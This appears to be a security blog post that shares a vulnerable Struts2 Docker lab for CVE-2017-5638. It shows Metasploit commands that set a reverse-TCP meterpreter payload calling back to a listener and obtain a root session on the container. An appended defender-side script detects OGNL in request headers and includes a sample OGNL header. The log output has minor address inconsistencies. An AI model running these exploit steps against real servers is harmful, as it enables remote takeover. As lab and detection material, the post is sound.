[WEB HACKING] Struts2 RCE (CVE-2017-5638, S2-045) test and Dockerfile share

I think I have written a post every time a Struts2 vulnerability came out. While checking today I noticed that a vulnerable app setup had been uploaded to Docker Hub, so I am writing this post to share it.

For details on the vulnerability itself, see my earlier post. (It has already been more than half a year..)

http://www.hahwul.com/2017/03/web-hacking-apache-struts2-remote-code.html

Dockerfile

https://hub.docker.com/r/piesecurity/apache-struts2-cve-2017-5638/

Looking at the contents of the Dockerfile..

FROM tomcat:7
MAINTAINER piesecurity <admin@pie-secure.org>
RUN set -ex \
&& rm -rf /usr/local/tomcat/webapps/* \
&& chmod a+x /usr/local/tomcat/bin/*.sh
COPY struts2-showcase-2.3.12.war /usr/local/tomcat/webapps/ROOT.war
EXPOSE 8080

Nothing special. All it does is run a Struts2 release from the vulnerable version range on Tomcat.

Let's run it.

#> docker run --name "struts2-cve" piesecurity/apache-struts2-cve-2017-5638

A simple tip, but.. you can find each docker container's IP by taking its container id and using the inspect option.

#> docker ps
CONTAINER ID        IMAGE                                      COMMAND                  CREATED             STATUS              PORTS                    NAMES
5e2a84ecdcdf        piesecurity/apache-struts2-cve-2017-5638   "catalina.sh run"        31 seconds ago      Up 30 seconds       8080/tcp                 silly_kowalevski
444a4a573471        danielguerra/kali-maltego                  "/usr/bin/supervisord"   About an hour ago   Up About an hour    0.0.0.0:5900->5900/tcp   maltego

#> docker inspect 5e2a84ecdcdf
[
    {
        "Id": "5e2a84ecdcdff82283995a06eb4e5b53f0023f3d7422c234f7e20cf435b97c7e",
        "Created": "2017-10-11T05:18:21.432088013Z",
        "Path": "catalina.sh",

[....]

            "Networks": {
                "bridge": {
                    "IPAMConfig": null,
                    "Links": null,
                    "Aliases": null,
                    "NetworkID": "ea3b29a04dab6e5ec26668ff1d080a96a60a5997de4da9facbd290f057ffffbc",
                    "EndpointID": "b49e1f3246d2964ebe24639e9cc0064caab1d3be5828dc9cfbacdbe5b1f14951",
                    "Gateway": "172.17.0.1",
                    "IPAddress": "172.17.0.3",
                    "IPPrefixLen": 16,
                    "IPv6Gateway": "",
                    "GlobalIPv6Address": "",
                    "GlobalIPv6PrefixLen": 0,
                    "MacAddress": "02:42:ac:11:00:03"
                }

Connecting to 172.17.0.3:8080, the app shows up fine :)

Struts2 Exploit

(This part is not really important. The main purpose of this post is just sharing the docker file..) You can exploit it from metasploit, or test it with a PoC. Searching for modules released this year turns up two (both are pretty nasty..), and since CVE-2017-5638 is the March one, I pick the OGNL Injection module.

HAHWUL > search cve:2017 struts2

Matching Modules

   Name                                          Disclosure Date  Rank       Description
   ----                                          ---------------  ----       -----------
   exploit/multi/http/struts2_content_type_ognl  2017-03-07       excellent  Apache Struts Jakarta Multipart Parser OGNL Injection
   exploit/multi/http/struts2_rest_xstream       2017-09-05       excellent  Apache Struts 2 REST Plugin XStream RCE

HAHWUL > use exploit/multi/http/struts2_content_type_ognl

Set RHOST, PAYLOAD and so on..

HAHWUL exploit(struts2_content_type_ognl) >
HAHWUL exploit(struts2_content_type_ognl) > set RHOST 172.17.0.3
RHOST => 170.17.0.3
HAHWUL exploit(struts2_content_type_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp

HAHWUL exploit(struts2_content_type_ognl) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
HAHWUL exploit(struts2_content_type_ognl) > show options

Module options (exploit/multi/http/struts2_content_type_ognl):

   Name       Current Setting     Required  Description
   ----       ---------------     --------  -----------
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      172.17.0.3          yes       The target address
   RPORT      8080                yes       The target port (TCP)
   SSL        false               no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /struts2-showcase/  yes       The path to a struts application action
   VHOST                          no        HTTP server virtual host

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.101   yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Universal

HAHWUL exploit(struts2_content_type_ognl) > set TARGETURI /
TARGETURI => /

Run it and... it works fine :)

HAHWUL exploit(struts2_content_type_ognl) > exploit -z

[*] Started reverse TCP handler on 192.168.56.101:4444
[*] Sending stage (2878936 bytes) to 172.17.0.3
[*] Meterpreter session 3 opened (192.168.56.101:4444 -> 172.17.0.3:41584) at 2017-10-11 22:25:16 +0900
[*] Session 3 created in the background.

HAHWUL auxiliary(syn) > sessions -l

Active sessions

  Id  Type                   Information                             Connection
  --  ----                   -----------                             ----------
  3   meterpreter x64/linux  uid=0, gid=0, euid=0, egid=0 @ 172.17.0.3  10.67.17.137:4444 -> 172.17.0.3:41584 (172.17.0.3)

HAHWUL auxiliary(syn) > sessions -i 3
[*] Starting interaction with 3...

meterpreter >
meterpreter > sysinfo
Computer     : 172.17.0.3
OS           : Debian 8.8 (Linux 4.4.0-96-generic)
Architecture : x64
Meterpreter  : x64/linux
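As an added defender-side note that is not part of the original post or of the Metasploit module: the struts2_content_type_ognl module used above delivers an OGNL expression through the Content-Type header that the Jakarta multipart parser evaluates, so a request whose Content-Type (or Content-Disposition) carries an OGNL marker such as `%{` or `${` is what to look for in proxy or web-server logs. The script below is my own illustration; the two sample requests are constructed, not captured traffic.

```python
import re
from typing import Dict, List

# OGNL expression openers that never belong in a MIME type value.
# S2-045 (CVE-2017-5638) is triggered by an OGNL expression placed in the
# Content-Type header that the Jakarta multipart parser evaluates.
OGNL_MARKER = re.compile(r"[%$]\{")
HEADER_RE = re.compile(r"^(?P<name>[A-Za-z0-9-]+):\s*(?P<value>.*)$")

# Headers the multipart parser consumes; both are worth watching.
WATCHED = {"content-type", "content-disposition"}


def check_request(raw: str) -> Dict[str, object]:
    """Inspect the header block of one raw HTTP request.

    Returns {"suspicious": bool, "hits": [..]} where each hit names the
    offending header and a truncated copy of its value for the alert.
    """
    hits: List[str] = []
    for line in raw.splitlines():
        if line == "":          # blank line ends the header block
            break
        m = HEADER_RE.match(line)
        if not m:
            continue            # request line or folded junk, skip
        name, value = m.group("name").lower(), m.group("value")
        if name in WATCHED and OGNL_MARKER.search(value):
            hits.append(f"{name}: {value[:60]}")
    return {"suspicious": bool(hits), "hits": hits}


# Constructed samples (not captured traffic): a normal multipart upload and
# a request with an OGNL expression where a MIME type should be.
BENIGN = (
    "POST / HTTP/1.1\r\nHost: 172.17.0.3:8080\r\n"
    "Content-Type: multipart/form-data; boundary=----probe\r\n\r\n"
)
SUSPECT = (
    "POST / HTTP/1.1\r\nHost: 172.17.0.3:8080\r\n"
    "Content-Type: %{(#probe='marker')}\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, check_request(req))
```

Matching on the opener alone is deliberately broad; the real fix is running a Struts release that no longer evaluates the header, and this check only tells you whether anyone is knocking.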

Reference

https://hub.docker.com/r/piesecurity/apache-struts2-cve-2017-5638/